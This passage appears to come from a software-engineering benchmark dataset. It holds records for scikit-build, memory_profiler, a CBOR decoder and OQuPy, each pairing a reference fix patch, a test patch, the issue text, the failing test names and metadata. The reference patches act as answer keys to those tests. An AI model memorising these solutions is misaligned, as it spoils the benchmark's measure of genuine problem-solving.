+ for parent_dir, file_set in data_files.items()
+ ]
+
+ # work around https://bugs.python.org/issue1011113
+ # (patches provided, but no updates since 2014)
+ cmdclass = kw.get('cmdclass', {})
+ cmdclass['build'] = cmdclass.get('build', build.build)
+ cmdclass['install'] = cmdclass.get('install', install.install)
+ cmdclass['clean'] = cmdclass.get('clean', clean.clean)
+ cmdclass['bdist'] = cmdclass.get('bdist', bdist.bdist)
+ cmdclass['bdist_wheel'] = cmdclass.get(
+ 'bdist_wheel', bdist_wheel.bdist_wheel)
+ kw['cmdclass'] = cmdclass
+
+ return upstream_setup(*args, **kw)
+
+def _classify_files(install_paths, package_data, package_prefixes, py_modules,
+ scripts, new_scripts, data_files):
install_root = os.path.join(os.getcwd(), cmaker.CMAKE_INSTALL_DIR)
- for path in cmkr.install():
+ for path in install_paths:
found_package = False
found_module = False
found_script = False
@@ -204,34 +248,3 @@ def setup(*args, **kw):
data_files[parent_dir] = file_set
file_set.add(os.path.join(cmaker.CMAKE_INSTALL_DIR, path))
del parent_dir, file_set
-
- kw['package_data'] = package_data
- kw['package_dir'] = {
- package: os.path.join(cmaker.CMAKE_INSTALL_DIR, prefix)
- for prefix, package in package_prefixes
- }
-
- kw['py_modules'] = py_modules
-
- kw['scripts'] = [
- os.path.join(cmaker.CMAKE_INSTALL_DIR, script) if mask else script
- for script, mask in new_scripts.items()
- ]
-
- kw['data_files'] = [
- (parent_dir, list(file_set))
- for parent_dir, file_set in data_files.items()
- ]
-
- # work around https://bugs.python.org/issue1011113
- # (patches provided, but no updates since 2014)
- cmdclass = kw.get('cmdclass', {})
- cmdclass['build'] = cmdclass.get('build', build.build)
- cmdclass['install'] = cmdclass.get('install', install.install)
- cmdclass['clean'] = cmdclass.get('clean', clean.clean)
- cmdclass['bdist'] = cmdclass.get('bdist', bdist.bdist)
- cmdclass['bdist_wheel'] = cmdclass.get(
- 'bdist_wheel', bdist_wheel.bdist_wheel)
- kw['cmdclass'] = cmdclass
-
- return upstream_setup(*args, **kw)
|
scikit-build/scikit-build
|
abaaeee43e0456ef9da7d4878f0310c569bd6525
|
diff --git a/tests/test_outside_project_root.py b/tests/test_outside_project_root.py
index 9500a4d..d67baa4 100644
--- a/tests/test_outside_project_root.py
+++ b/tests/test_outside_project_root.py
@@ -5,7 +5,8 @@
----------------------------------
Tries to build the `fail-outside-project-root` sample project. Ensures that the
-attempt fails with an SKBuildError exception.
+attempt fails with a SystemExit exception that has an SKBuildError exception as
+its value.
"""
from skbuild.exceptions import SKBuildError
@@ -23,10 +24,10 @@ def test_outside_project_root_fails():
def should_fail():
pass
- exception_thrown = False
+ failed = False
try:
should_fail()
- except SKBuildError:
- exception_thrown = True
+ except SystemExit as e:
+ failed = isinstance(e.code, SKBuildError)
- assert exception_thrown
+ assert failed
|
Improve cmaker exception
When there is a problem building a Python module, report a "human-friendly" error.
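A minimal sketch of the idea (hypothetical names and message format): catch a non-zero CMake return code and exit with a readable summary instead of letting a raw traceback reach the user.

```python
import subprocess
import sys

def run_cmake(cmd, cwd):
    # Report a human-friendly error rather than raising CalledProcessError.
    rtn = subprocess.call(cmd, cwd=cwd)
    if rtn != 0:
        sys.exit(
            "An error occurred while running CMake.\n"
            "  Command:           {}\n"
            "  Working directory: {}\n"
            "Please see CMake's output for more information.".format(
                " ".join(cmd), cwd))
```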
|
0.0
|
abaaeee43e0456ef9da7d4878f0310c569bd6525
|
[
"tests/test_outside_project_root.py::test_outside_project_root_fails"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-07-22 19:35:31+00:00
|
mit
| 5,355
|
|
pythonprofilers__memory_profiler-280
|
diff --git a/README.rst b/README.rst
index b52b6f2..79d1c6b 100644
--- a/README.rst
+++ b/README.rst
@@ -64,14 +64,14 @@ this would result in::
Output will follow::
- Line # Mem usage Increment Line Contents
- ==============================================
- 3 @profile
- 4 5.97 MB 0.00 MB def my_func():
- 5 13.61 MB 7.64 MB a = [1] * (10 ** 6)
- 6 166.20 MB 152.59 MB b = [2] * (2 * 10 ** 7)
- 7 13.61 MB -152.59 MB del b
- 8 13.61 MB 0.00 MB return a
+ Line # Mem usage Increment Occurences Line Contents
+ ============================================================
+ 3 38.816 MiB 38.816 MiB 1 @profile
+ 4 def my_func():
+ 5 46.492 MiB 7.676 MiB 1 a = [1] * (10 ** 6)
+ 6 199.117 MiB 152.625 MiB 1 b = [2] * (2 * 10 ** 7)
+ 7 46.629 MiB -152.488 MiB 1 del b
+ 8 46.629 MiB 0.000 MiB 1 return a
The first column represents the line number of the code that has been
diff --git a/memory_profiler.py b/memory_profiler.py
index cd4ba4f..632bee3 100644
--- a/memory_profiler.py
+++ b/memory_profiler.py
@@ -280,10 +280,10 @@ def memory_usage(proc=-1, interval=.1, timeout=None, timestamps=False,
to this file instead of stored in memory and returned at the end of
the subprocess. Useful for long-running processes.
Implies timestamps=True.
-
+
max_iterations : int
Limits the number of iterations (calls to the process being monitored). Relevent
- when the process is a python function.
+ when the process is a python function.
Returns
-------
@@ -357,7 +357,7 @@ def memory_usage(proc=-1, interval=.1, timeout=None, timestamps=False,
raise
p.join(5 * interval)
-
+
if (n_measurements > 4) or (current_iter == max_iter) or (interval < 1e-6):
break
interval /= 10.
@@ -643,7 +643,12 @@ class CodeMap(dict):
prev_line_value = self[code].get(prev_lineno, None) if prev_lineno else None
prev_line_memory = prev_line_value[1] if prev_line_value else 0
- self[code][lineno] = (max(previous_inc, memory-prev_line_memory), max(memory, previous_memory))
+ occ_count = self[code][lineno][2] + 1 if lineno in self[code] else 1
+ self[code][lineno] = (
+ previous_inc + (memory - prev_line_memory),
+ max(memory, previous_memory),
+ occ_count,
+ )
def items(self):
"""Iterate on the toplevel code blocks."""
@@ -800,10 +805,10 @@ class LineProfiler(object):
def show_results(prof, stream=None, precision=1):
if stream is None:
stream = sys.stdout
- template = '{0:>6} {1:>12} {2:>12} {3:<}'
+ template = '{0:>6} {1:>12} {2:>12} {3:>10} {4:<}'
for (filename, lines) in prof.code_map.items():
- header = template.format('Line #', 'Mem usage', 'Increment',
+ header = template.format('Line #', 'Mem usage', 'Increment', 'Occurences',
'Line Contents')
stream.write(u'Filename: ' + filename + '\n\n')
@@ -817,13 +822,15 @@ def show_results(prof, stream=None, precision=1):
for (lineno, mem) in lines:
if mem:
inc = mem[0]
- mem = mem[1]
- mem = template_mem.format(mem)
+ total_mem = mem[1]
+ total_mem = template_mem.format(total_mem)
+ occurences = mem[2]
inc = template_mem.format(inc)
else:
- mem = u''
+ total_mem = u''
inc = u''
- tmp = template.format(lineno, mem, inc, all_lines[lineno - 1])
+ occurences = u''
+ tmp = template.format(lineno, total_mem, inc, occurences, all_lines[lineno - 1])
stream.write(to_str(tmp))
stream.write(u'\n\n')
|
pythonprofilers/memory_profiler
|
8a8a40252cccc09dc469445596742dc6b47ed6e3
|
diff --git a/test/test_increment_display.py b/test/test_increment_display.py
new file mode 100644
index 0000000..b0dbe51
--- /dev/null
+++ b/test/test_increment_display.py
@@ -0,0 +1,81 @@
+import unittest
+
+from memory_profiler import LineProfiler, profile, show_results
+from io import StringIO
+
+
+class TestIncrementDisplay(unittest.TestCase):
+ """Tests memory incrementation / decrementation display"""
+
+ def test_loop_count(self):
+
+ def some_loop():
+ for i in range(12): # line -2
+ a = 1 # line -1
+
+ profiler = LineProfiler()
+ wrapped = profiler(some_loop)
+ wrapped()
+ show_results(profiler)
+ for_line = list(list(profiler.code_map.values())[0].values())[-2]
+ looped_instruction = list(list(profiler.code_map.values())[0].values())[-1]
+
+ self.assertEqual(for_line[2], 13)
+ self.assertEqual(looped_instruction[2], 12)
+
+ def test_normal_incr(self):
+
+ def normal_incr():
+ use_some_memory = [1] * (10 ** 6)
+
+ profiler = LineProfiler()
+ wrapped = profiler(normal_incr)
+ wrapped()
+
+ show_results(profiler)
+ results = list(list(profiler.code_map.values())[0].values())[-1]
+
+ self.assertGreater(results[0], 0)
+ self.assertGreater(results[1], results[0])
+ self.assertEqual(results[2], 1)
+
+ def test_loop_incr(self):
+
+ def loop_incr():
+ a = []
+ b = [2] * (2 * 10 ** 7) # line -4
+ for i in range(3):
+ c = [2] * (2 * 10 ** 7) # line -2
+ a.append(c)
+
+ profiler = LineProfiler()
+ wrapped = profiler(loop_incr)
+ wrapped()
+
+ show_results(profiler)
+ b_line = list(list(profiler.code_map.values())[0].values())[-4]
+ c_line = list(list(profiler.code_map.values())[0].values())[-2]
+ self.assertAlmostEqual(b_line[2] * 3, c_line[2], delta=1)
+ self.assertEqual(c_line[2], 3)
+
+ def test_decr(self):
+
+ def del_stuff():
+ b = [2] * (2 * 10 ** 7)
+ del b
+
+ profiler = LineProfiler()
+ wrapped = profiler(del_stuff)
+ wrapped()
+
+ show_results(profiler)
+ b_line = list(list(profiler.code_map.values())[0].values())[-2]
+ del_line = list(list(profiler.code_map.values())[0].values())[-1]
+
+ self.assertGreater(0, del_line[0])
+ self.assertGreater(del_line[1], 0)
+ self.assertAlmostEqual(-del_line[0], b_line[0], delta=1)
+
+
+if __name__ == '__main__':
+ unittest.main()
|
The first example in readme not working correctly
Here's what I get on both Windows and Linux.
```
Line # Mem usage Increment Line Contents
================================================
1 37.754 MiB 37.754 MiB @profile
2 def my_func():
3 45.195 MiB 7.441 MiB a = [1] * (10 ** 6)
4 197.820 MiB 152.625 MiB b = [2] * (2 * 10 ** 7)
5 45.449 MiB 0.000 MiB del b
6 45.449 MiB 0.000 MiB return a
```
I would expect it to show the released memory after `del b`, as described in the readme file.
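For reference, the readme example that produced the output above (reproduced here; it is typically run with `python -m memory_profiler example.py`):

```python
from memory_profiler import profile

@profile
def my_func():
    a = [1] * (10 ** 6)
    b = [2] * (2 * 10 ** 7)
    del b
    return a

if __name__ == '__main__':
    my_func()
```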
|
0.0
|
8a8a40252cccc09dc469445596742dc6b47ed6e3
|
[
"test/test_increment_display.py::TestIncrementDisplay::test_decr",
"test/test_increment_display.py::TestIncrementDisplay::test_loop_count",
"test/test_increment_display.py::TestIncrementDisplay::test_loop_incr",
"test/test_increment_display.py::TestIncrementDisplay::test_normal_incr"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-05-10 03:07:05+00:00
|
bsd-3-clause
| 5,119
|
|
megajanlott__cbor-decoder-47
|
diff --git a/cbor/MajorType.py b/cbor/MajorType.py
index d9b0d34..2f43a8c 100644
--- a/cbor/MajorType.py
+++ b/cbor/MajorType.py
@@ -3,6 +3,7 @@ from cbor.State import State
from cbor.type.ByteString import ByteString
from cbor.type.TextString import TextString
from cbor.type.Array import ArrayInfo
+from cbor.type.Map import MapInfo
MAJOR_TYPE_MASK = 0b11100000
MAJOR_TYPE_SIZE = 3
@@ -26,5 +27,7 @@ class MajorType(State):
return TextString()
elif t == 4:
return ArrayInfo()
+ elif t == 5:
+ return MapInfo()
return
diff --git a/cbor/type/Map.py b/cbor/type/Map.py
new file mode 100644
index 0000000..e46f64e
--- /dev/null
+++ b/cbor/type/Map.py
@@ -0,0 +1,84 @@
+import cbor.CBORStream
+import cbor.MajorType
+import cbor.State
+
+
+class MapInfo(cbor.State.State):
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ info = stream.read(1)
+ length = ord(info) & 0b00011111
+ handler('{')
+ if length == 0:
+ handler('}')
+ elif length < 24:
+ return [MapReadValue(length), cbor.MajorType.MajorType()]
+ elif length == 24:
+ return [MapLen(1)]
+ elif length == 25:
+ return [MapLen(2)]
+ elif length == 26:
+ return [MapLen(4)]
+ elif length == 27:
+ return [MapLen(8)]
+ elif length == 31:
+ return [MapInfValue(), cbor.MajorType.MajorType()]
+ return []
+
+
+class MapLen(cbor.State.State):
+
+ def __eq__(self, other):
+ return self.n == other.n
+
+ def __init__(self, n: int):
+ self.n = n
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ info = stream.read(self.n)
+ length = int.from_bytes(info, byteorder='big')
+ return [MapReadValue(length), cbor.MajorType.MajorType()]
+
+
+class MapReadKey(cbor.State.State):
+
+ def __eq__(self, other):
+ return self.n == other.n
+
+ def __init__(self, n: int):
+ self.n = n
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ if self.n == 0:
+ handler('}')
+ return []
+ if self.n > 0:
+ handler(',')
+ return [MapReadValue(self.n), cbor.MajorType.MajorType()]
+
+
+class MapReadValue(cbor.State.State):
+
+ def __eq__(self, other):
+ return self.n == other.n
+
+ def __init__(self, n: int):
+ self.n = n
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ handler(':')
+ return [MapReadKey(self.n-1), cbor.MajorType.MajorType()]
+
+
+class MapInfKey(cbor.State.State):
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ handler(',')
+ return [MapInfValue(), cbor.MajorType.MajorType()]
+
+
+class MapInfValue(cbor.State.State):
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ handler(':')
+ return [MapInfKey(), cbor.MajorType.MajorType()]
|
megajanlott/cbor-decoder
|
c2af49e12ad7fe36433ec013b176f4dda89a4b2e
|
diff --git a/tests/test_Map.py b/tests/test_Map.py
new file mode 100644
index 0000000..7497c8d
--- /dev/null
+++ b/tests/test_Map.py
@@ -0,0 +1,147 @@
+from io import BytesIO
+from cbor.MajorType import MajorType
+from cbor.CBORStream import CBORStream
+from cbor.type.Map import *
+from tests.MockHandler import MockHandler
+from cbor.Decoder import Decoder
+
+
+def ignore_handler(v):
+ return
+
+
+def test_run_map_probe():
+ data = CBORStream(BytesIO(bytes([0b10100001])))
+ assert type(MajorType().run(data, None)) == MapInfo
+
+
+def test_run_map_length():
+ # Map length lower than 24.
+ data = CBORStream(BytesIO(bytes([0b10100011])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 2
+ assert type(stack[0]) == MapReadValue
+ assert stack[0] == MapReadValue(3)
+ assert type(stack[1]) == MajorType
+
+
+def test_run_map_length_multibyte():
+ # Map length on 1 byte.
+ data = CBORStream(BytesIO(bytes([
+ 0b10111000, 0b1
+ ])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 1
+ assert type(stack[0]) == MapLen
+ assert stack[0] == MapLen(1)
+ stack2 = stack[0].run(data, ignore_handler)
+ assert len(stack2) == 2
+ assert type(stack2[0]) == MapReadValue
+ assert stack2[0] == MapReadValue(1)
+ assert type(stack2[1]) == MajorType
+
+ # Map length on 2 bytes.
+ data = CBORStream(BytesIO(bytes([
+ 0b10111001, 0b1, 0b0
+ ])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 1
+ assert type(stack[0]) == MapLen
+ assert stack[0] == MapLen(2)
+ stack2 = stack[0].run(data, ignore_handler)
+ assert len(stack2) == 2
+ assert type(stack2[0]) == MapReadValue
+ assert stack2[0] == MapReadValue(1 << 8)
+ assert type(stack2[1]) == MajorType
+
+ # Map length on 4 bytes.
+ data = CBORStream(BytesIO(bytes([
+ 0b10111010, 0b1, 0b0, 0b0, 0b0
+ ])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 1
+ assert type(stack[0]) == MapLen
+ assert stack[0] == MapLen(4)
+ stack2 = stack[0].run(data, ignore_handler)
+ assert len(stack2) == 2
+ assert type(stack2[0]) == MapReadValue
+ assert stack2[0] == MapReadValue(1 << 24)
+ assert type(stack2[1]) == MajorType
+
+ # Map length on 8 bytes.
+ data = CBORStream(BytesIO(bytes([
+ 0b10111011, 0b1, 0b0, 0b0, 0b0, 0b0, 0b0, 0b0, 0b0
+ ])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 1
+ assert type(stack[0]) == MapLen
+ assert stack[0] == MapLen(8)
+ stack2 = stack[0].run(data, ignore_handler)
+ assert len(stack2) == 2
+ assert type(stack2[0]) == MapReadValue
+ assert stack2[0] == MapReadValue(1 << 56)
+ assert type(stack2[1]) == MajorType
+
+
+def test_run_map_inf():
+ # Map with infinite length.
+ data = CBORStream(BytesIO(bytes([0b10111111])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 2
+ assert type(stack[0]) == MapInfValue
+ assert type(stack[1]) == MajorType
+
+
+def test_run_map_inf_key():
+ # Map with infinite length.
+ data = CBORStream(BytesIO(bytes([])))
+ stack = MapInfKey().run(data, ignore_handler)
+ assert len(stack) == 2
+ assert type(stack[0]) == MapInfValue
+ assert type(stack[1]) == MajorType
+
+
+def test_run_map_inf_value():
+ # Map with infinite length.
+ data = CBORStream(BytesIO(bytes([])))
+ stack = MapInfValue().run(data, ignore_handler)
+ assert len(stack) == 2
+ assert type(stack[0]) == MapInfKey
+ assert type(stack[1]) == MajorType
+
+
+def test_run_map_info_empty():
+ handler = MockHandler()
+
+ # Empty array.
+ data = CBORStream(BytesIO(bytes([0b10100000])))
+ stack = MapInfo().run(data, handler.handler)
+ assert len(stack) == 0
+ handler.assert_data('{}')
+
+
+def test_run_map_single_element():
+ handler = MockHandler()
+
+ # Empty array.
+ d = Decoder()
+ data = bytes([0b10100001, 0b10100000, 0b10100000])
+ d.decode_array(data, handler.handler)
+ print(handler.data)
+ handler.assert_data('{{}:{}}')
+
+
+def test_run_map_two_elements():
+ handler = MockHandler()
+
+ # Empty array.
+ d = Decoder()
+ data = bytes([
+ 0b10100010,
+ 0b10100000,
+ 0b10100000,
+ 0b10100000,
+ 0b10100000])
+ d.decode_array(data, handler.handler)
+ print(handler.data)
+ handler.assert_data('{{}:{},{}:{}}')
|
Map
Map states:
- [ ] Implement MapInfo
- [ ] Implement MapReadKey(n)
- [ ] Implement MapReadValue(n)
- [ ] Implement MapLen(n)
- [ ] Implement MapInfKey()
- [ ] Implement MapInfValue()
Additional info about states can be found here:
https://docs.google.com/document/d/1tvQJtJbYUcM2vI5H0RDukWqNYsLxjczZ30PiBFFVsV8/edit#
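Not part of the decoder itself, but a small illustration of the map header byte that `MapInfo` has to parse: major type 5 sits in the top three bits and the additional info (the length) in the low five bits.

```python
header = 0b10100010           # a definite-length map with 2 key/value pairs
major_type = header >> 5      # -> 5 (map)
length = header & 0b00011111  # -> 2
assert (major_type, length) == (5, 2)
```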
|
0.0
|
c2af49e12ad7fe36433ec013b176f4dda89a4b2e
|
[
"tests/test_Map.py::test_run_map_probe",
"tests/test_Map.py::test_run_map_length",
"tests/test_Map.py::test_run_map_length_multibyte",
"tests/test_Map.py::test_run_map_inf",
"tests/test_Map.py::test_run_map_inf_key",
"tests/test_Map.py::test_run_map_inf_value",
"tests/test_Map.py::test_run_map_info_empty",
"tests/test_Map.py::test_run_map_single_element",
"tests/test_Map.py::test_run_map_two_elements"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_added_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-05-02 10:56:59+00:00
|
mit
| 3,858
|
|
tempoCollaboration__OQuPy-71
|
diff --git a/oqupy/mps_mpo.py b/oqupy/mps_mpo.py
index 29e080c..6a24a85 100644
--- a/oqupy/mps_mpo.py
+++ b/oqupy/mps_mpo.py
@@ -198,14 +198,13 @@ def compute_nn_gate(
nn_gate: NnGate
Nearest neighbor gate.
"""
- # exponentiate and transpose such that
- # axis 0 is the input and axis 1 is the output leg of the propagator.
- propagator = linalg.expm(dt*liouvillian).T
+ # exponentiate the liouvillian to become a propagator
+ propagator = linalg.expm(dt*liouvillian)
# split leg 0 and leg 1 each into left and right.
- propagator.shape = [hs_dim_l**2,
- hs_dim_r**2,
- hs_dim_l**2,
- hs_dim_r**2]
+ propagator.shape = [hs_dim_l**2, # left output
+ hs_dim_r**2, # right output
+ hs_dim_l**2, # left input
+ hs_dim_r**2] # right input
temp = np.swapaxes(propagator, 1, 2)
temp = temp.reshape([hs_dim_l**2 * hs_dim_l**2,
hs_dim_r**2 * hs_dim_r**2])
@@ -217,7 +216,9 @@ def compute_nn_gate(
sqrt_s = np.sqrt(s)
u_sqrt_s = u * sqrt_s
sqrt_s_vh =(sqrt_s * vh.T).T
+ # left tensor with legs: left output, left input, bond
tensor_l = u_sqrt_s.reshape(hs_dim_l**2, hs_dim_l**2, chi)
+ # right tensor with legs: bond, right output, right input
tensor_r = sqrt_s_vh.reshape(chi, hs_dim_r**2, hs_dim_r**2)
return NnGate(site=site, tensors=(tensor_l, tensor_r))
diff --git a/oqupy/operators.py b/oqupy/operators.py
index 2566dcf..8dde09e 100644
--- a/oqupy/operators.py
+++ b/oqupy/operators.py
@@ -197,7 +197,7 @@ def cross_left_right_super(
operator_2_l: ndarray,
operator_2_r: ndarray) -> ndarray:
"""
- Construct anit-commutator of cross term (acting on two Hilbert spaces).
+ Contruct map from rho to [(op1l x op2l) rho (op1r x op2r)].
"""
op1l_op1r = np.kron(operator_1_l, operator_1_r.T)
op2l_op2r = np.kron(operator_2_l, operator_2_r.T)
diff --git a/oqupy/system.py b/oqupy/system.py
index a7d11c1..184a68b 100644
--- a/oqupy/system.py
+++ b/oqupy/system.py
@@ -429,7 +429,8 @@ class SystemChain(BaseAPIClass):
self._nn_liouvillians = []
for hs_dim_l, hs_dim_r in zip(self._hs_dims[:-1], self._hs_dims[1:]):
self._nn_liouvillians.append(
- np.zeros((hs_dim_l**4, hs_dim_r**4), dtype=NpDtype))
+ np.zeros((hs_dim_l**2 * hs_dim_r**2, hs_dim_l**2 * hs_dim_r**2),
+ dtype=NpDtype))
super().__init__(name, description)
@@ -496,7 +497,7 @@ class SystemChain(BaseAPIClass):
liouvillian: ndarray
Liouvillian acting on the single site.
"""
- raise NotImplementedError()
+ self._site_liouvillians[site] += np.array(liouvillian, dtype=NpDtype)
def add_site_dissipation(
self,
@@ -525,12 +526,13 @@ class SystemChain(BaseAPIClass):
gamma: float
Optional multiplicative factor :math:`\gamma`.
"""
- op = lindblad_operator
+ op = np.array(lindblad_operator, dtype=NpDtype)
op_dagger = op.conjugate().T
self._site_liouvillians[site] += \
- gamma * (opr.left_right_super(op, op_dagger)
+ gamma * (opr.left_right_super(op, op_dagger) \
- 0.5 * opr.acommutator(np.dot(op_dagger, op)))
+
def add_nn_hamiltonian(
self,
site: int,
@@ -585,7 +587,7 @@ class SystemChain(BaseAPIClass):
liouvillian_l_r: ndarray
Liouvillian acting on sites :math:`n` and :math:`n+1`.
"""
- self._nn_liouvillians[site] += liouvillian_l_r
+ self._nn_liouvillians[site] += np.array(liouvillian_l_r, dtype=NpDtype)
def add_nn_dissipation(
self,
|
tempoCollaboration/OQuPy
|
b3355f4c8a6e7001275e78c287d52f6d25c96e53
|
diff --git a/tests/coverage/pt_tebd_test.py b/tests/coverage/pt_tebd_test.py
index 80e47fc..b2fcc54 100644
--- a/tests/coverage/pt_tebd_test.py
+++ b/tests/coverage/pt_tebd_test.py
@@ -17,11 +17,12 @@ Tests for the time_evovling_mpo.pt_tebd module.
import pytest
+import numpy as np
import oqupy
up_dm = oqupy.operators.spin_dm("z+")
-system_chain = oqupy.SystemChain(hilbert_space_dimensions=[2,2])
-initial_augmented_mps = oqupy.AugmentedMPS([up_dm, up_dm])
+system_chain = oqupy.SystemChain(hilbert_space_dimensions=[2,3])
+initial_augmented_mps = oqupy.AugmentedMPS([up_dm, np.diag([1,0,0])])
pt_tebd_params = oqupy.PtTebdParameters(dt=0.2, order=2, epsrel=1.0e-4)
def test_get_augmented_mps():
@@ -32,8 +33,10 @@ def test_get_augmented_mps():
parameters=pt_tebd_params)
augmented_mps = pt_tebd.get_augmented_mps()
- assert augmented_mps.gammas[1].shape == (1,4,1,1)
+ assert augmented_mps.gammas[0].shape == (1,4,1,1)
+ assert augmented_mps.gammas[1].shape == (1,9,1,1)
- pt_tebd.compute(end_step=1, progress_type='silent')
+ pt_tebd.compute(end_step=2, progress_type='silent')
augmented_mps = pt_tebd.get_augmented_mps()
- assert augmented_mps.gammas[1].shape == (1,4,1,1)
+ assert augmented_mps.gammas[0].shape == (1,4,1,1)
+ assert augmented_mps.gammas[1].shape == (1,9,1,1)
diff --git a/tests/physics/example_H_test.py b/tests/physics/example_H_test.py
new file mode 100644
index 0000000..2688cc7
--- /dev/null
+++ b/tests/physics/example_H_test.py
@@ -0,0 +1,101 @@
+# Copyright 2020 The TEMPO Collaboration
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+"""
+Tests for the time_evovling_mpo.backends.tensor_network modules.
+"""
+import sys
+sys.path.insert(0,'.')
+
+import pytest
+import numpy as np
+
+import oqupy
+
+# -----------------------------------------------------------------------------
+# -- Test F: Test Lindblad dissipation for PT-TEBD ---------------------------
+
+# --- Parameters --------------------------------------------------------------
+
+# -- time steps --
+dt = 0.1
+num_steps = 10
+
+# -- bath --
+alpha = 0.3
+omega_cutoff = 3.0
+temperature = 0.8
+pt_dkmax = 10
+pt_epsrel = 1.0e-6
+
+# -- chain --
+N = 5
+Omega = 1.0
+eta = 0.3
+Delta = 1.2
+h = np.array(
+ [[1.0, 0.0, 0.0],
+ [2.0, 0.0, 0.0],
+ [3.0, 0.0, 0.0],
+ [4.0, 0.0, 0.0],
+ [5.0, 0.0, 0.0]]) * np.pi / 10
+J = np.array([[Delta, 1.0+eta, 1.0-eta]]*(N-1))
+up_dm = oqupy.operators.spin_dm("z+")
+down_dm = oqupy.operators.spin_dm("z-")
+tebd_order = 2
+tebd_epsrel = 1.0e-7
+
+
+def test_pt_tebd_site_dissipation_H1():
+ # -- initial state --
+ initial_augmented_mps = oqupy.AugmentedMPS([up_dm, down_dm, down_dm])
+
+ # -- add single site dissipation --
+ system_chain = oqupy.SystemChain(hilbert_space_dimensions=[2,2,2])
+ # lowering operator on site 0:
+ system_chain.add_site_dissipation(0,[[0,0],[1,0]])
+ # identity cross raising operator on sites 1 and 2:
+ system_chain.add_nn_dissipation(1,np.identity(2),[[0,1],[0,0]])
+
+ # -- PT-TEBD parameters --
+ pt_tebd_params = oqupy.PtTebdParameters(
+ dt=dt,
+ order=tebd_order,
+ epsrel=tebd_epsrel)
+
+ num_steps = int(1.0/pt_tebd_params.dt)
+
+ pt_tebd = oqupy.PtTebd(
+ initial_augmented_mps=initial_augmented_mps,
+ system_chain=system_chain,
+ process_tensors=[None]*3,
+ parameters=pt_tebd_params,
+ dynamics_sites=[0,1,2],
+ chain_control=None)
+
+ r = pt_tebd.compute(num_steps, progress_type="silent")
+
+ np.testing.assert_almost_equal(
+ r['dynamics'][0].states[-1],
+ [[np.exp(-1),0],[0,1-np.exp(-1)]],
+ decimal=4)
+ np.testing.assert_almost_equal(
+ r['dynamics'][1].states[-1],
+ [[0,0],[0,1]],
+ decimal=4)
+ np.testing.assert_almost_equal(
+ r['dynamics'][2].states[-1],
+ [[1-np.exp(-1),0],[0,np.exp(-1)]],
+ decimal=4)
+
+# -----------------------------------------------------------------------------
|
Bug in SystemChain.add_site_dissipation()
Adding a Markovian Lindblad dissipator to a system chain seems to go wrong, as one can see from the decay of the norm in the following example with dissipation on the first site of a two-site chain (without any coherent evolution):
```python3
import oqupy
import numpy as np
import matplotlib.pyplot as plt
sigma_z = oqupy.operators.sigma("z")
sigma_minus = oqupy.operators.sigma("-")
up_dm = oqupy.operators.spin_dm("z+")
down_dm = oqupy.operators.spin_dm("z-")
initial_augmented_mps = oqupy.AugmentedMPS([up_dm, down_dm])
system_chain = oqupy.SystemChain(hilbert_space_dimensions=[2,2])
system_chain.add_site_dissipation(0, sigma_minus, gamma=0.2)
pt_tebd_params = oqupy.PtTebdParameters(
    dt=0.1,
    order=2,
    epsrel=1.0e-6)
pt_tebd = oqupy.PtTebd(
    initial_augmented_mps=initial_augmented_mps,
    system_chain=system_chain,
    process_tensors=[None, None, None, None, None],
    parameters=pt_tebd_params,
    dynamics_sites=[0, 1],
    chain_control=None)
num_steps = 20
results = pt_tebd.compute(num_steps, progress_type="bar")
plt.plot(results['norm'].real)
```
The norm drops below 0.7 in 20 time steps, which seems to be a real bug and not just a numerical error.
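For context on the fix above: the site dissipator being assembled there has the standard Lindblad form γ(L ρ L† − ½{L†L, ρ}), which is trace preserving, so the norm should stay at 1. Below is a minimal NumPy sketch of that construction as a sanity check — the helper functions only mimic the names used in OQuPy's `opr` module and are re-implemented here for illustration (row-major vectorization assumed):
```python
import numpy as np

def left_right_super(a, b):
    # superoperator for rho -> a @ rho @ b (row-major vectorization of rho)
    return np.kron(a, b.T)

def acommutator(op):
    # superoperator for rho -> op @ rho + rho @ op
    eye = np.identity(op.shape[0])
    return np.kron(op, eye) + np.kron(eye, op.T)

gamma = 0.2
op = np.array([[0.0, 0.0], [1.0, 0.0]])      # sigma_minus
op_dagger = op.conjugate().T

dissipator = gamma * (left_right_super(op, op_dagger)
                      - 0.5 * acommutator(op_dagger @ op))

rho = np.array([[1.0, 0.0], [0.0, 0.0]])     # spin-up density matrix
drho = (dissipator @ rho.reshape(-1)).reshape(2, 2)
print(np.trace(drho))                        # ~0.0: the dissipator preserves the trace
```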
|
0.0
|
b3355f4c8a6e7001275e78c287d52f6d25c96e53
|
[
"tests/coverage/pt_tebd_test.py::test_get_augmented_mps",
"tests/physics/example_H_test.py::test_pt_tebd_site_dissipation_H1"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-08-07 14:28:26+00:00
|
apache-2.0
| 5,845
|
|
ej2__python-quickbooks-180
|
